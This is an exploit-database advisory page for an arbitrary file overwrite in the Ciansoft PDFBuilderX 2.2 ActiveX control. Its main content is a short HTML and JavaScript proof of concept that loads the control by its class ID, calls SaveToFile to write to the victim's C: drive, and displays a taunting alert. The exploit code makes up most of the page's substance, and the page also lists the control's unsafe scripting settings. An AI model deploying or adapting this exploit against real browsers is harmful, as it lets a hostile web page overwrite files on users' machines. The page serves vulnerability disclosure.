PDFBuilderX 2.2 Arbitrary File Overwrite

2009.01.18
Credit: fakeperson7
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Alfons Luja ======================================================================================================================== <b> Ciansoft PDFBuilderX 2.2 Arbitrary File Overwrite <br/> p0c <br/> Alfons Luja <br/> Pozdrowienia dla odFiecznych fanf <br/> Tesw Eporue <br/> -9002- <br/> l00l <br/> <b/> <object classid='clsid:00E7C7F8-71E2-498A-AB28-A3D72FC74485' id='kupa'></object> <script> /* Class PDFDoc GUID: {00E7C7F8-71E2-498A-AB28-A3D72FC74485} RegKey Safe for Script: False RegKey Safe for Init: False Implements IObjectSafety: True IDisp Safe: Safe for untrusted: caller,data IPStorage Safe: Safe for untrusted: caller,data KillBitSet: False vend0r : www.ciansoft.com */ try{ var obj = document.getElementById('kupa'); obj.AddPage(1); obj.SaveToFile("C:/system_.ini"); window.alert('Aplauz !!! g0rion pownsYa l0l - n0wH Check ya C:'); } catch(err){ window.alert('Poc failed'); } </script> ========================================================================================================================

References:

http://seclists.org/bugtraq/2009/Jan/0091.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top